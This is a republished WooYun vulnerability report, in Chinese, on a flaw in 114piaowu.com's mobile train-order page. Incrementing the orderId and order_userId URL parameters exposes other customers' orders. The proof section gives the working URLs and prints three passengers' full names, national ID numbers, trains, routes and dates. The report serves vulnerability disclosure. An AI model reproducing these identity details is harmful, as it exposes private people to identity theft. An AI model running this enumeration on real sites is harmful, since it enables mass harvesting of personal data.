114票务网某站逻辑漏洞利用支付超时导致上万用户敏感信息泄漏(订单号/姓名/身份证/火车出发路线)

admin 2017年4月30日15:00:02评论346 views字数 271阅读0分54秒阅读模式
摘要

2016-05-26: 细节已通知厂商并且等待厂商处理中
2016-05-26: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-31: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(15) 关注此漏洞

缺陷编号: WooYun-2016-213011

漏洞标题: 114票务网某站逻辑漏洞利用支付超时导致上万用户敏感信息泄漏(订单号/姓名/身份证/火车出发路线)

相关厂商: 114piaowu.com

漏洞作者: 0x 80

提交时间: 2016-05-26 11:09

公开时间: 2016-05-31 13:40

漏洞类型: 敏感信息泄露

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 敏感信息泄露 错误信息未屏蔽 用户敏感信息泄漏

1人收藏


漏洞详情

披露状态:

2016-05-26: 细节已通知厂商并且等待厂商处理中
2016-05-26: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

114票务网某站逻辑漏洞利用支付超时导致上万用户敏感信息泄漏(订单号/姓名/身份证/火车出发路线)

详细说明:

http://m.114piaowu.com/userCenterTrain/userCenterTrain_payTrainOrder.action?orderId=9272363&order_userId=5311555

114票务网某站逻辑漏洞利用支付超时导致上万用户敏感信息泄漏(订单号/姓名/身份证/火车出发路线)

问题参数:orderId=和order_userId没有被加密

导致逻辑,9272363递增1的时候,5311555也必须递增1即可

9272363递减1的时候,5311555也必须递减1即可,依此类推

114票务网某站逻辑漏洞利用支付超时导致上万用户敏感信息泄漏(订单号/姓名/身份证/火车出发路线)

code 区域
<div class="wrapper radius clearfix order_content">
<h5>订单详情:&nbsp;<b>S2016020511211093656</b></h5>
<div>
G7338&nbsp;永康南-金华南&nbsp;&nbsp;
2016年02月06日&nbsp;二等座&nbsp;
自取票&nbsp;&nbsp;
1张
</div>
<h5>
乘客信息:
</h5>
<table>
<tr>
<td>
金妙缘&nbsp;
成人票&nbsp;&nbsp;
<br/>(330702199905102342)
</td>
</table>

http://m.114piaowu.com/userCenterTrain/userCenterTrain_payTrainOrder.action?orderId=9272364&order_userId=5311556

114票务网某站逻辑漏洞利用支付超时导致上万用户敏感信息泄漏(订单号/姓名/身份证/火车出发路线)

code 区域
<h5>订单详情:&nbsp;<b>H2016020511214527799</b></h5>
<div>
K9788&nbsp;焉耆-乌鲁木齐南&nbsp;&nbsp;
2016年02月06日&nbsp;硬座&nbsp;
自取票&nbsp;&nbsp;
1张
</div>
<h5>
乘客信息:
</h5>
<table>
<tr>
<td>
张哈车&nbsp;
成人票&nbsp;&nbsp;
<br/>(652826196712292329)
</td>
</table>

http://m.114piaowu.com/userCenterTrain/userCenterTrain_payTrainOrder.action?orderId=9272361&order_userId=5311553

114票务网某站逻辑漏洞利用支付超时导致上万用户敏感信息泄漏(订单号/姓名/身份证/火车出发路线)

code 区域
<h5>订单详情:&nbsp;<b>H2016020511205940865</b></h5>
<div>
K267&nbsp;荆门-澧县&nbsp;&nbsp;
2016年02月07日&nbsp;硬座&nbsp;
自取票&nbsp;&nbsp;
1张
</div>
<h5>
乘客信息:
</h5>
<table>
<tr>
<td>
戴潮&nbsp;
成人票&nbsp;&nbsp;
<br/>(430723199401035815)
</td>
</table>

漏洞证明:

code 区域
http://m.114piaowu.com/userCenterTrain/userCenterTrain_payTrainOrder.action?orderId=9272363&order_userId=5311555

114票务网某站逻辑漏洞利用支付超时导致上万用户敏感信息泄漏(订单号/姓名/身份证/火车出发路线)



问题参数:orderId=和order_userId没有被加密

导致逻辑,9272363递增1的时候,5311555也必须递增1即可

9272363递减1的时候,5311555也必须递减1即可,依此类推查询上万用户敏感信息

code 区域
http://m.114piaowu.com/userCenterTrain/userCenterTrain_payTrainOrder.action?orderId=9272363&order_userId=5311555

修复方案:

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-31 13:40

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2016-06-02:感谢告知,已修补


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin